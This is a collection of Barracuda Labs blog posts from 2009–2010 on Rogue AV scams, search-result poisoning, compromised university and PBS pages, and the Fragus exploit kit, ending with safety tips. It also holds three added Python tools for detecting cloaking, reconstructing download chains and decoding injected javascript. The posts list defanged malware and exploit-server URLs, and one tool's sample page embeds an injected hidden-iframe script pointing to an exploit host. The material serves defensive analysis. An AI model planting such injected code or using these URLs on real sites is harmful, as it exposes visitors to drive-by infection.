Scammers Cashing in on Facebook ‘Un named’ App Hoax

January 30, 2010

Posted by: Barracuda Labs

On Wednesday, a seemingly harmless application listing glitch led numerous users to believe that a spybot attack was under way on Facebook. Due to the bug, an application listed as ‘Unnamed App’ appeared in some users’ application settings. Some users took this as the presence of a spybot that would steal their account details and passwords and perform malicious activities on their computer. Those users warned other users about it, and hence word about the ‘Unnamed App’ spread like wildfire within a few hours.

Ultimately, this was a harmless bug; however, curious users turned to Google to learn more about it, and scammers saw this as a golden opportunity. The scammers quickly harnessed the search query ‘unnamed app’ and poisoned its search results to include sites that would redirect users to a site serving Rogue AntiVirus instead. This has become a very popular technique among scammers in the past few months.

Clicking on search results titled ‘Unnamed App’ redirects the user to Rogue AV:

Scam artists also attempted to hide from the research community by selectively redirecting only users who visited straight from Google by clicking one of the search results. Visitors (mostly researchers) who attempted to go to the malicious search result directly were redirected to http://www.cnn.com instead.

There are multiple ways to achieve this. In this case, the attackers inspected the HTTP Referer header to determine where the visitor had come from.
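A defender-side check for the Referer-dependent redirection described above, added here as an example (not code from the Barracuda Labs post): it visits a URL once as a Google click-through and once directly, and flags the page when the two visits land on different hosts. The poisoned page is simulated; the .invalid hostnames are constructed placeholders.

```python
"""Check a URL for Referer-dependent redirection ("cloaking").

Added example, not code from the Barracuda Labs post. It models the behaviour the
post describes: a poisoned search result that sends visitors arriving from a
Google search to a Rogue AV site and everyone else (researchers typing the URL
in directly) to cnn.com. The check visits the same URL twice, once with a search
Referer and once without, and flags it when the two visits diverge. The
rogue-av-landing.invalid and poisoned-example.invalid hosts are constructed
placeholders; cnn.com and google.com come from the post.
"""
from typing import Callable, Dict, Optional
from urllib.parse import urlparse

# Constructed placeholder; ".invalid" is reserved and never resolves.
ROGUE_AV_LANDING = "http://rogue-av-landing.invalid/scan.php"
DECOY = "http://www.cnn.com/"

# fetch(url, referer) -> final URL after redirects
Fetcher = Callable[[str, Optional[str]], str]


def simulated_poisoned_page(url: str, referer: Optional[str]) -> str:
    """Stand-in for the compromised page's server-side logic (constructed).

    Returns the URL the visitor is redirected to. The decision rests solely on
    the Referer header, which is the technique the post attributes to the scammers.
    """
    host = urlparse(referer).hostname if referer else None
    from_google = host is not None and (host == "google.com" or host.endswith(".google.com"))
    return ROGUE_AV_LANDING if from_google else DECOY


def check_cloaking(url: str, fetch: Fetcher,
                   search_referer: str = "http://www.google.com/search?q=unnamed+app") -> Dict[str, object]:
    """Visit `url` as a search click-through and as a direct visit and compare.

    `fetch(url, referer)` must return the final URL after following redirects
    (in a live tool this would wrap an HTTP client; here a simulation is passed).
    A page whose two visits land on different hosts behaves like the cloaked
    pages in the post; a scanner that omits the search Referer would only ever
    see the harmless destination.
    """
    via_search = fetch(url, search_referer)
    direct = fetch(url, None)
    return {
        "url": url,
        "via_search": via_search,
        "direct": direct,
        "cloaked": urlparse(via_search).hostname != urlparse(direct).hostname,
    }


if __name__ == "__main__":
    print(check_cloaking("http://poisoned-example.invalid/unnamed-app.html",
                         simulated_poisoned_page))
```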

Hence a seemingly harmless bug was still able to do some damage to innocent users’ browsing experience today.

Users of the Barracuda Purewire Web Security Service are protected from this attack.


Online Safety: Tips to Protect Your Information

December 21, 2009

Posted by: Barracuda Labs

With the increased awareness and attention around incidents of identity theft, consumers are becoming more vigilant in how they provide personal information online. At the same time, businesses that require such information to complete a transaction also must evaluate how they collect that information online from consumers.

For example, a colleague recently forwarded the email below from Southwest requesting personal information to complete the Transportation Security Administration’s (TSA) Secure Flight verification. Because the email was sent after the flight reservation was booked, it was unclear to the recipient whether or not the email was legitimate. Upon examination, it is clear that this is a legitimate email from Southwest; however, it is one that could easily be forged by a spammer or hacker attempting to collect a user’s personal information.

As people are making final travel arrangements and gift purchases online in this last week leading up to the holidays, Barracuda Networks has compiled a number of tips to help consumers discern legitimate emails and Web sites from malicious attempts, as well as recommendations for businesses to better serve their consumers online.

Online consumer safety:

1. Real or fake? Do not click on links included in an email. Instead, type the address directly into your Internet browser.

2. Email security and anti-virus solutions up-and-running. Make sure you have a strong email security solution in place that can block spam and phishing emails as well as detect and block viruses and other malware (including malicious Web links) contained in the email. As an extra precaution, make sure your desktop anti-virus protection is up-to-date and running. This will keep any viruses/malware not sent over email from infecting your computer or adding you to a larger botnet.

3. Strong Web filtering. Having a strong Web filter in place will allow you to block access to potentially dangerous Web sites. Web filters can also block downloads by file type and applications that access the Internet (e.g., IM, music services), which hackers often use as a means of transporting malware onto your computer.

4. When in doubt, check it out. If you receive an email from a business that you recently have done an online transaction with – retail, bank, airline, etc. – and are not sure of its authenticity, check it out. Call or email the business to verify that the request is legitimate. Also, you can go directly to that company’s Web site to look for warnings listed of recent Web scams that have targeted the business.

Helping businesses serve customers:

1. On-site, at-once. Request all necessary customer information at the time of purchase, while the consumer is on the Web site. In the case of the Southwest email, if the consumer had been directed to the “MySouthwest Account” to provide this information at the time of flight reservation and purchase, it would have expedited the process for the consumer and eliminated the need to send a follow up email that raised the suspicion of the recipient.

2. Avoid follow up email. Consumers are likely to be more suspicious of emails requesting that they log back into – or create – an account to provide personal information.

3. Provide clear instructions. If sending a follow up email to complete the transaction is unavoidable, provide a clear message to the consumer at the end of the initial online transaction – before they leave the Web site – so that they know to expect an email that will require additional information and what that required information will be.

4. Privacy Policy. Be sure to provide a privacy policy that’s easy to find and is clear on what the Web site will and won’t do with the information entered.

5. Protect customer information on your site. Businesses are responsible for ensuring that the customer information they collect online is protected from those with malicious intent. Implementing a strong Web application firewall protects the business Web site from being hacked and customer information from being stolen.

The underlying goal here is to ensure that businesses that legitimately require user information receive it in a timely and secure fashion. That will keep the bad guys out of consumers’ wallets and bank accounts, and from stealing their identities.

If you look at the email, you will see that we have identified that its hyperlinks take you to a legitimate Southwest domain. We know it is a legitimate Web site because the hyperlinks’ URLs point to the Southwest domain.


Yet Another Reputable Site Asks You to Install Rogue AV

December 18, 2009

Posted by: Barracuda Labs

Yet another reputable site has fallen victim to compromise — University of Arkansas.

This Tuesday, Barracuda’s Malicious Javascript Detection engine (MJD) identified Rogue AV software being distributed from a page belonging to the University of Arkansas Web site. When users accessed a particular page on the university Web site, it opened a window warning them that their computer was infected with viruses and then downloaded what was identified as fake anti-virus software.

A forensic analysis of the attack revealed that the user requested the following:

hxxp://bumperscollege.uark.edu/ssp_director/inc/html/d/georgia-inmate-query.html

which in turn requested a javascript from a malicious domain via script include:

hxxp://xrusx.com/counter.php?sref=bumperscollege.uark.edu/ssp_director/inc/html/d/georgia-inmate-query.html

which contained further malicious javascript includes that generated fake warning messages on the user’s computer.

which ultimately attempted to download setup.exe, linked off another malicious domain:

hxxp://www.loker.us/forum/attachments/setup.exe

While investigating deeper into the user’s tracks to determine how the user got to this page, we made yet another interesting discovery. Our investigation could not find the user browsing any page on the University of Arkansas site that linked directly to the malicious page distributing the Rogue AV. Instead, it was a Bing search result that led the user to this page. Specifically, one customer using the Barracuda Purewire Web Security Service searched for ‘georgiainmatequery’ on the Microsoft Bing search engine:

hxxp://www.bing.com/search?q=georgiainmatequery

This yielded the following results:

As you can see, the malicious link from uArk.edu shows up in the Bing search results, and in the number two spot. The page is leveraging uArk.edu’s reputation ranking in what we’ve previously reported on as SEO poisoning (see previous post). This is becoming increasingly popular, as hackers target vulnerabilities in legitimate Web sites because a page on a reputable site is more likely to be visited. While search engines have been proactively adding malware scanning to their arsenal, legitimate Web site owners also need to take proactive steps to keep their sites free of such malicious content.
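The Referer walk behind this kind of forensic reconstruction, as an added example that is not the post’s own tooling: it rebuilds the search-to-payload chain from constructed proxy log lines that mirror the requests listed above (a placeholder host stands in for the fake warning page, and the tab-separated log layout is assumed), and also lists the third-party resources each page in the chain pulled in, which is where the xrusx.com script include appears.

```python
"""Reconstruct a drive-by download chain from web proxy log lines via Referer headers.

Added example, not code from the Barracuda Labs post. The five log lines are
constructed to mirror the chain the post describes (Bing search -> uark.edu page
-> xrusx.com script include -> fake warning page -> loker.us setup.exe); the
fake-scanner.invalid host and the timestamps are placeholders, and the
tab-separated layout (time, client, method, url, referer, content-type) is an
assumed format, not any particular proxy's own. URLs keep the post's defanged
hxxp scheme; the parser turns it back into http so hosts can be parsed.
"""
import re
from dataclasses import dataclass
from typing import Dict, List, Optional
from urllib.parse import parse_qs, urlparse

SEARCH_ENGINES = {"www.bing.com": "q", "www.google.com": "q"}  # host -> query parameter

UARK_PAGE = "hxxp://bumperscollege.uark.edu/ssp_director/inc/html/d/georgia-inmate-query.html"
LOG = (  # constructed sample log; one request per line
    "2009-12-15T10:02:11Z\t10.1.2.3\tGET\thxxp://www.bing.com/search?q=georgiainmatequery\t-\ttext/html\n"
    f"2009-12-15T10:02:14Z\t10.1.2.3\tGET\t{UARK_PAGE}\thxxp://www.bing.com/search?q=georgiainmatequery\ttext/html\n"
    f"2009-12-15T10:02:15Z\t10.1.2.3\tGET\thxxp://xrusx.com/counter.php?sref={UARK_PAGE[7:]}\t{UARK_PAGE}\tapplication/javascript\n"
    f"2009-12-15T10:02:16Z\t10.1.2.3\tGET\thxxp://fake-scanner.invalid/alert.html\t{UARK_PAGE}\ttext/html\n"
    "2009-12-15T10:02:20Z\t10.1.2.3\tGET\thxxp://www.loker.us/forum/attachments/setup.exe\thxxp://fake-scanner.invalid/alert.html\tapplication/octet-stream\n"
)


@dataclass
class Request:
    ts: str
    client: str
    url: str
    referer: Optional[str]
    ctype: str


def refang(url: Optional[str]) -> Optional[str]:
    """Map '-' to None and hxxp(s):// back to http(s):// so urlparse sees a host."""
    if not url or url == "-":
        return None
    return re.sub(r"^hxxp(s?)://", r"http\1://", url, flags=re.IGNORECASE)


def parse_log(text: str) -> List[Request]:
    reqs = []
    for line in text.strip().splitlines():
        ts, client, _method, url, referer, ctype = line.split("\t")
        reqs.append(Request(ts, client, refang(url), refang(referer), ctype))
    return reqs


def is_executable(r: Request) -> bool:
    return r.ctype == "application/octet-stream" or urlparse(r.url).path.lower().endswith(".exe")


def reconstruct_chain(reqs: List[Request], client: str) -> Optional[Dict[str, object]]:
    """Walk Referer links back from a client's executable download to the search that
    started it; also report the third-party resources each page in the chain pulled in."""
    mine = [r for r in reqs if r.client == client]
    by_url = {r.url: r for r in mine}
    payloads = [r for r in mine if is_executable(r)]
    if not payloads:
        return None
    cur = payloads[-1]
    chain, seen, search_term = [cur.url], {cur.url}, None
    while cur.referer and cur.referer not in seen:
        seen.add(cur.referer)
        chain.append(cur.referer)
        ref = urlparse(cur.referer)
        if ref.hostname in SEARCH_ENGINES:
            search_term = parse_qs(ref.query).get(SEARCH_ENGINES[ref.hostname], [None])[0]
            break
        cur = by_url.get(cur.referer)
        if cur is None:  # referer never requested through this proxy (cached?); stop
            break
    chain.reverse()
    includes = {}
    for page in chain:  # off-host resources loaded by each page, excluding the chain itself
        host = urlparse(page).hostname
        third = [r.url for r in mine
                 if r.referer == page and r.url not in chain and urlparse(r.url).hostname != host]
        if third:
            includes[page] = third
    return {"search_term": search_term, "chain": chain, "third_party_includes": includes}
```

Run on LOG, the result names ‘georgiainmatequery’ as the search term, a four-hop chain from Bing to setup.exe, and the xrusx.com counter.php include attributed to the uark.edu page.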

Customers using the Barracuda Purewire Web Security Service are protected from this attack.


Web Security: Be Careful Clicking on the Google Doodle

December 15, 2009

Posted by: Barracuda Labs

It’s been widely reported that Google sponsored links are being used for malicious purposes. Once again, Google is an easy target and consumers are vulnerable. Rogue AV continues to be a big business, and the criminals are taking advantage of the more popular (and trafficked) areas to spread their wares.

Today, December 15, 2009, is the 150th birthday of LL Zamenhof, the inventor of Esperanto (an international auxiliary language).

Google celebrated by decorating its logo with the flag of Esperanto, turning it into what is called a Google Doodle (Google often uses its logo to celebrate various historical events etc http://www.google.com/logos/).

Clicking on the Google Doodle performs a search for the term “LL Zamenhof” – making it remain steady in the top 5-10 most popular searches of the day. Malware distributors have recognized this significant opportunity to concentrate their poisoning efforts on popular search terms. This is just another egregious act of criminals using these Google popular search terms – and SEO poisoning – as vehicles to carry out their malicious intent.

On page one of the search results, one of the examples falls under the domain rubbermouse.com. The poisoned results point to legitimate domains that have been compromised, which leverages each site’s already good Google reputation so that the results do not appear with a Google SafeSearch alert. This is becoming increasingly common for almost any popular search term.

Once the user clicks on the link, he/she is redirected to a Rogue AV site (hxxp://antyspywaretoday.net….). On this page, the user is warned that the computer might be infected, a fake scan ensues, and then the user is prompted to purchase the AV software, regardless of whether the user clicks “OK” or not.

How prevalent is this? Of the first 100 results, 31 are poisoned sites. Even better, of the first 50 results, 27 are poisoned. These criminals understand search engine optimization, and they are good at it!

The sites are hard to identify – and hard to remove – since they are designed to re-direct to multiple sites (some with malicious intent such as selling Rogue AV, and some offering up nothing more than a waste of time via a fake search site). Regardless, these rogue orphan pages exist and are under the control of those who can, with the push of a button, offer up dangerous exploits to attack users, steal information, and damage corporate networks.

What’s most concerning about this – Google is posting its Doodle, inviting users to click (out of their own curiosity, they will), and then serving up more than half of the results as malicious. What does that say about the current state of search and SEO?

Below are several screenshots taken from this experiment.

GoogleDoodle1 – Google Doodle from today 12/15/09.

GoogleDoodle2 – First results: at first, these look good. Upon further review, the entry with the link sio.ucsd.edu/cop15/newsroom/?byza=6 shows that it’s gibberish… The site is most likely compromised, but it’s down as of this writing.

GoogleDoodle3 – Most of the results in this image are poisoned and clicking on the rubbermouse.com link provides GoogleDoodle4 (see below).

GoogleDoodle4 – Once clicking on rubbermouse, the user is then redirected to the fake antivirus site regardless of which button is pressed.

GoogleDoodle5 – This additional prompt attempts to reassure the user about downloading the payload. Until the payload is downloaded, the user is not really infected.

GoogleDoodle6 – This Web page is carefully crafted to mimic the Windows look and feel, but it’s still a Web page. A javascript animation makes it look like the user’s computer is being scanned and threats are being found. Nothing of the sort is taking place.

GoogleDoodle7 – Once it’s done “scanning” the user is then served this page — and there are no mouse options at this point.

GoogleDoodle8 – This is an attempted delivery of the payload. Until the user clicks “run” on one of these dialogs, he/she is not infected. If the user does click, the program will install (in this case, Internet Antivirus Pro) but does nothing real other than nag the user for money so that it can be ‘activated’ for use. These fake antivirus programs (Rogue AV) purport to find many threats, but in fact do not find or fix anything at all.

GoogleDoodle9 – This image shows the Internet traffic generated by this click. From the compromised site rubbermouse.com, it goes to a free Webhost in Poland which redirects the browser to an intermediary, godotscan.com. This site then redirects the browser to the final malicious site, docipge.cn. This site will most likely be active for only a few days before it’s replaced by a new landing site.


Preview to a Possible Future of Rogue AV

December 2, 2009

Posted by: Barracuda Labs

Yesterday, Purewire’s Malicious Javascript Detection (MJD) engine identified the following malicious URL:

hxxp://unsoft.eu/hitin.php?affid=02992

The site uses a now ubiquitous social engineering lure: fake javascript-generated alerts that claim the user’s system is infected with malware:

If the user believes these alerts to be genuine, the following Rogue AV software (called “Privacy Center”) will end up installed on their system:

The above screenshots are representative of what Rogue AV looks like today. But what about the Rogue AV of tomorrow? Investigation of other malicious domains related to unsoft.eu yielded the discovery of one such future vision of rogue software.

The story of this vision begins at newtunesclub.com, which resolves to the same IP address as unsoft.eu. However, instead of serving the user fake pop-up scanners and alert notifications, the site claims to act as a media distribution portal:

In addition, unlike some rogue software operations, newtunesclub.com is well put-together and includes a functioning search engine. As an example, the top result of a search for “Troy” is the 2004 movie of the same name; clicking on the result presents the user with accurate release and cast information, a series of movie stills, and a link to download the movie:

Yet, instead of a large movie, a small executable is served when the user clicks on the Download button. This executable has the same icon as the Rogue AV software served off of unsoft.eu:

In addition, about half of the few VirusTotal detections identify the above Troy executable as Rogue AV:

http://www.virustotal.com/analisis/4f40e8bb48d660a8b3d13d19f401a2f831469eaa7dd6607be872860d0c7ef1c3-1259366297

However, the similarities between these two binaries end at identical icons and similar AV detections. When Troy.exe is run, a larger executable is downloaded from the following location:

hxxp://iqmediamanager.com/download/0

This larger binary is automatically executed and installs an interesting type of rogue software (called “IQ Manager”) on the user’s system:

Before IQ Manager even attempts to connect outbound, a child window appears, stating that there are “no empty spots” in the “shared channel”, and that the user must “wait their turn” or “activate the VIP Channel”. Activation, of course, requires a credit card.

However, even if the user decides not to perform activation, the download proceeds:

Upon completion, the resulting file was indeed a playable copy of the 2004 movie Troy. Subsequent investigation into IQ Manager’s operation revealed that it acts as a BitTorrent client, using torrents offered by the popular tracker thepiratebay.org.

While current Rogue AV software offers the user almost nothing, newtunesclub.com and the IQ Manager software collectively provide a functional (if illicit) download service that will meet many users’ expectations. If this model proves financially successful for the criminals behind it, “pay for free” software could become a standard that forms the face of tomorrow’s rogue software.

Users of the PWSS are protected from this emergent threat.


Fake Microsoft Outlook Updates Spread Rogue AV

October 16, 2009

Posted by: Barracuda Labs

Yesterday, a Purewire employee received an email claiming to offer an update to his Microsoft Outlook configuration:

From: < redacted >
Date: Thursday, October 15, 2009 2:12 PM
To: < redacted >@purewire.com
Subject: Microsoft Outlook Notification for the < redacted >@purewire.com

You have (6) New Message from Outlook Microsoft

- Please re-configure your Microsoft Outlook Again.
- Download attached setup file and install.

The email was accompanied by a zip file that contained an executable with a business-looking smart phone icon.

Install Icon

Instead of a configuration update, the file was actually a malware downloader. When executed, it downloads and installs additional malicious software from the following URL:

hxxp://uvgadferbotario.com/X1j0uHc5Htr8Lw0i4Wv6Jz7Ha

AV detections for the second-stage executable are poor:

http://www.virustotal.com/analisis/027bd581ec937628b5fd187b72a95a99f397e9f2bcb1f6d6c8d757c872af2176-1255724269

In this case, the second-stage malware is a brand of Rogue AV software called Antivirus Pro 2010; a screenshot with examples of the different types of bogus alerts it generates is shown below.

Antivirus Pro 2010

This brand of fraudware is particularly aggressive; its tactics include the production of fake errors (about every 30 minutes) that require the user to either purchase the full version of the software or reboot their system.

Users of the PWSS are protected from this threat.


Twitter Trending Topics Used to Propagate Rogue AV

September 18, 2009

Posted by: Barracuda Labs

Last night, a Purewire employee was directed to a Rogue AV website after clicking on a link in a tweet that matched a popular topic. Subsequent analysis uncovered an active Rogue AV propagation campaign that attempts to lure users to malicious websites via tweets that contain popular terms searched on Twitter.

The malicious tweets draw part of their word content from Twitter’s Trending Topics list; a screenshot of the list at the time of this writing is shown below.

Twitter Trending Topics

Searches for some of the above topics lead to tweets like the following examples:

hxxp://securityland.cn/?uid=144&pid=3&ttl=31c48520c54

which acts as a traffic distribution system for a Rogue AV operation; the chain of redirections ends at one of the following Rogue AV distribution points:

All of the above sites serve javascript-based fake system scanners:

which attempt to compel the user to download Windows PC Defender, a brand of Rogue AV software. AV detections for the Rogue AV malware instance served are non-existent:

http://www.virustotal.com/analisis/9a155d62af5b43be29018f7d0f52875503c6d15a3c891cb5807ed123398889ca-1253323103

Users of the PWSS are protected from this campaign.


PBS Website Compromised, Used to Serve Exploits

September 16, 2009

Posted by: Barracuda Labs

On Monday of this week, Purewire’s Malicious Javascript Detection (MJD) engine identified malicious activity originating from a page that belongs to the popular website pbs.org. Specifically, attempts to access certain PBS website pages yielded javascript that serves exploits from a malicious domain via an iframe.

A forensic analysis of this attack revealed that the user requested the following:

hxxp://www.pbs.org/parents/curiousgeorge

which in turn requested:

hxxp://dipsy.pbs.org/parents/ptframe/images/bground-leaderboard.jpg

instead of:

hxxp://www.pbs.org/parents/ptframe/images/bground-leaderboard.jpg

Accessing the image off of dipsy.pbs.org requires login credentials, as shown in the following screenshot.

PBS Login Prompt

If correct credentials are not provided, dipsy.pbs.org serves an error page that looks normal:

… until you look under the hood. The end of the error page’s source:

contains obfuscated javascript placed there by a malicious third party. Deobfuscated, this code writes an iframe that loads malicious javascript from the following malicious URL:

hxxp://qxfcuc.info/f.cgi?jzo

The above URL serves exploits that target a variety of software vulnerabilities, including those in Acrobat Reader (CVE-2008-2992, CVE-2009-0927, and CVE-2007-5659), AOL Radio AmpX (CVE-2007-6250), AOL SuperBuddy (CVE-2006-5820) and Apple QuickTime (CVE-2007-0015).

The domain qxfcuc.info is part of a malware campaign that includes tens of similar websites hosted off of a handful of common IP addresses. Similar exploit code was served from most of these domains, although a handful (e.g., yyoqny.info) display a message that suggests the criminal behind this campaign is compromising systems to build a botnet he will likely later lease. Translated from Russian, that message tells prospective leasers to “Send a message to ICQ #559156803; stats available under ststst02.”
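A triage helper for the hidden-iframe injection described above, added as an example (not code from the post): it decodes the unescape() and String.fromCharCode() wrappers such injections commonly use and extracts the iframe targets from the tail of a constructed error page built around the post’s qxfcuc.info URL (kept defanged). It is a first-pass decoder for captured pages, not a general javascript deobfuscator.

```python
"""Decode lightly obfuscated injected javascript and pull out hidden iframe targets.

Added example, not code from the Barracuda Labs post. SAMPLE_PAGE is constructed
to resemble what the post describes: script appended after the end of a
normal-looking error page that document.write()s a hidden iframe pointing at the
exploit server (the qxfcuc.info URL is the one the post names, kept defanged).
It peels the unescape('%..') and String.fromCharCode(..) layers such injections
commonly use; it is a triage helper, not a general deobfuscator.
"""
import re
from typing import Dict, List
from urllib.parse import unquote

SAMPLE_PAGE = (  # constructed; injected script sits after </html>
    "<html><head><title>401 Authorization Required</title></head>\n"
    "<body><h1>Authorization Required</h1><p>This server could not verify that you "
    "are authorized to access the document requested.</p></body></html>\n"
    "<script>document.write(unescape('%3Ciframe%20src%3D%22hxxp%3A//qxfcuc.info/f.cgi%3Fjzo%22"
    "%20width%3D1%20height%3D1%20style%3D%22visibility%3Ahidden%22%3E%3C/iframe%3E'));</script>\n"
)

UNESCAPE_RE = re.compile(r"unescape\(\s*(['\"])(.*?)\1\s*\)", re.DOTALL)
FROMCHARCODE_RE = re.compile(r"String\.fromCharCode\(\s*([0-9,\s]+)\)")
IFRAME_SRC_RE = re.compile(r"<iframe\b[^>]*\bsrc\s*=\s*['\"]?([^'\"\s>]+)", re.IGNORECASE)


def js_unescape(s: str) -> str:
    """JavaScript unescape(): handles %uXXXX as well as %XX sequences."""
    s = re.sub(r"%u([0-9a-fA-F]{4})", lambda m: chr(int(m.group(1), 16)), s)
    return unquote(s)


def decode_layers(js: str, max_rounds: int = 5) -> str:
    """Replace unescape()/fromCharCode() calls with their literal results, repeatedly,
    so nested wrappers are peeled one round at a time until nothing changes."""
    for _ in range(max_rounds):
        new = UNESCAPE_RE.sub(lambda m: js_unescape(m.group(2)), js)
        new = FROMCHARCODE_RE.sub(
            lambda m: "".join(chr(int(n)) for n in m.group(1).split(",") if n.strip()), new)
        if new == js:
            break
        js = new
    return js


def trailing_script(html: str) -> str:
    """Anything after the closing </html> tag: a common spot for injected code,
    since it does not disturb the page the site owner sees."""
    idx = html.lower().rfind("</html>")
    return html[idx + len("</html>"):].strip() if idx != -1 else ""


def hidden_iframe_targets(js: str) -> List[str]:
    return IFRAME_SRC_RE.findall(decode_layers(js))


def triage_page(html: str) -> Dict[str, object]:
    """Flag a page whose after-</html> tail decodes to an iframe pointing somewhere."""
    tail = trailing_script(html)
    targets = hidden_iframe_targets(tail)
    return {"has_trailing_script": "<script" in tail.lower(),
            "iframe_targets": targets,
            "suspicious": bool(targets)}


if __name__ == "__main__":
    print(triage_page(SAMPLE_PAGE))
```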

Users of the PWSS are protected from this campaign.

Update, Sep 18, 2:49PM ET: PBS has notified Purewire that the malicious javascript has been removed from its site.


The Fragus Exploit Kit

August 25, 2009

Posted by: Barracuda Labs

Recently, Purewire’s Malicious Javascript Detection (MJD) engine identified malicious URLs backed by what was found to be Fragus, a new exploit kit that appeared in late July 2009. An example of a Fragus URL and a screenshot of its admin control panel login page are shown directly below.

hxxp://blt.kz/1/show.php?s=5015ba5606

Fragus Admin Control Panel Login

As with most modern exploit kits, Fragus serves not one, but a grab bag of exploits that attack the browser, ActiveX controls, and third party plugins. Deobfuscating the javascript served off of the above URL revealed the following function names (bodies omitted), which each attempt to exploit one or more different vulnerabilities:

directshow(): Performs heap spraying, then serves hxxp://blt.kz/1/directshow.php, which targets the Microsoft Video (DirectShow) ActiveX control vulnerability (a.k.a., MS09-032).

pdf(): Serves hxxp://blt.kz/1/pdf.php?eid=3, which targets Acrobat Reader vulnerabilities in util.printf, Collab.getIcon, and Collab.collectEmailInfo (a.k.a., CVE-2008-2992, CVE-2009-0927, and CVE-2007-5659, respectively).

flash(): Serves hxxp://blt.kz/1/swf.php?eid=4, which targets the Adobe Flash Player integer overflow vulnerability (a.k.a., CVE-2007-0071).

aolwinamp(): Performs heap spraying, then attempts to exploit the AOL Radio AmpX (AOLMediaPlaybackControl) ActiveX control vulnerability (a.k.a., CVE-2007-6250).

snapshot(): Targets the Microsoft Access Snapshot Viewer ActiveX control vulnerability (a.k.a., MS08-041) in an attempt to have hxxp://blt.kz/1/load.php?e=6 executed.

spreadsheet(): Performs heap spraying, then attempts to exploit the Microsoft Office Web Components ActiveX control vulnerability (a.k.a., MS09-043).

ms09002(): Performs heap spraying, then attempts to exploit the Microsoft Internet Explorer 7 memory corruption vulnerability (a.k.a., MS09-002).

The above set of exploits prompts two observations about the continuing evolution of the web threat landscape. First, given that Fragus targets vulnerabilities in at least seven different software components, ranking a given vulnerability as more or less exploited than another is increasingly at odds with how it is actually used. Modern exploit kits target any and all vulnerabilities that have a reasonable chance of successfully compromising a system, and unfortunately the presence of just one vulnerable, out-of-date software component is all that is required for that compromise to occur. Second, as one of the above vulnerabilities (MS09-043) is less than a month old, the time between the discovery of a vulnerability and its widespread use by criminals is shrinking. The creators of malware infrastructure now rapidly integrate recently discovered vulnerabilities into do-it-yourself exploit kits, and security companies must be increasingly quick to respond.

Users of the PWSS are protected from this threat.


5 Tips For Staying Safe In Social Networks

August 13, 2009

Posted by: Barracuda Labs

In case you haven’t noticed, social networking sites are taking over the Internet. They receive the most traffic; they generate the most media attention, and let’s face it: they’re where all the cool kids are hanging out. Unfortunately, as these sites become more and more popular, they also become more and more attractive as targets for attackers.

So what can you do to protect yourself from attackers? If you’re incredibly paranoid, you can just boycott all social networking sites (that’s what the Marines do). Or if that’s a little too extreme, you can always follow these five simple guidelines for protecting yourself in these environments:

1.) Don’t use “password” as your password. I know it’s easy to remember, but it’s also incredibly easy to guess. Instead, use a strong password with at least 8 characters that consists of numbers, mixed case letters, and special characters. Also, be sure to use a hard-to-guess password reset question (i.e., don’t end up like Sarah Palin’s Yahoo! account).

2.) Don’t use the same password at multiple sites. I realize this is somewhat inconvenient, but consider the alternative. If you use the same password at every site, what happens when one of your accounts is compromised? You guessed it: all of your accounts are compromised! Scary, right?! Now, go change your passwords!!!

3.) Don’t give your username and password to untrusted sites. Some legitimate sites will ask for your username and password (e.g., sites that support Facebook Connect), but you should always verify the trustworthiness of a site before you enter your credentials. When in doubt, err on the side of caution and avoid becoming yet another phishing victim.

4.) Don’t click on that! Never click on links from unknown users because they can lead you to any number of malicious destinations. Even if you trust the user, use caution because you never know when one of your friends has been compromised (not everyone reads this blog :-P ). Also, be extremely careful with shortened URLs because you have no idea where they will lead you. To be on the safe side, use an unshortener (e.g., Untiny, Unshorten, etc.) to determine a shortened URL’s final destination.

5.) Verify the trustworthiness of people by using reputation systems such as Purewire Trust and TweetGrade. Social networking sites are like the Wild Wild West of the Internet, but reputation systems aim to establish a sense of order to these sites so that users can make informed decisions in these environments. Before interacting with unknown individuals in a social networking site, you should check their reputations in one of these systems to safeguard yourself from malicious activity.

If all else fails, just remember to use common sense! When a smoking hot stranger sends you a friend request or a link, just ignore it and keep on moving.
